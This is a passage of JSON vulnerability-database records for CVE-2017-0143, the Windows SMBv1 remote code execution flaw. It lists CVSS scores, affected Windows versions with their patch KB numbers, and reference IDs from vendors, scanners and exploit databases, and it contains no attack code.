["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-04T06:47:20", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-04T06:47:20", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB3205409", "KB3177186", "KB4012217", "KB4012215", "KB3213986", "KB3212646", "KB4012213", "KB4013429", "KB3205401", "KB4013198", "KB4012214", "KB4012606", "KBMS16-110, 3187754", "KB3210721", "KB3210720", "KB4012216", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T06:47:20", "differentElements": ["msAffectedSoftware"], "edition": 7}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-04T08:55:45", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-04T08:55:45", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-04T08:55:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012217", "KB4012212", "KB4012214", "KB4012216", "KB3212646", "KBMS16-110, 3187754", "KB4013198", "KB3210720", "KB4012215", "KB3213986", "KB4013429", "KB3205409", "KB4012606", "KB4012598", "KB3177186", "KB3205401", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T08:55:45", "differentElements": ["msAffectedSoftware"], "edition": 8}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-04T14:46:24", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-04T14:46:24", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-04T14:46:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012212", "KB4012215", "KB4012217", "KB4012606", "KB4012216", "KB4013429", "KBMS16-110, 3187754", "KB4012214", "KB4012213", "KB3210721", "KB3205401", "KB4012598", "KB3210720", "KB3213986", "KB3205409", "KB3212646", "KB4013198", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": 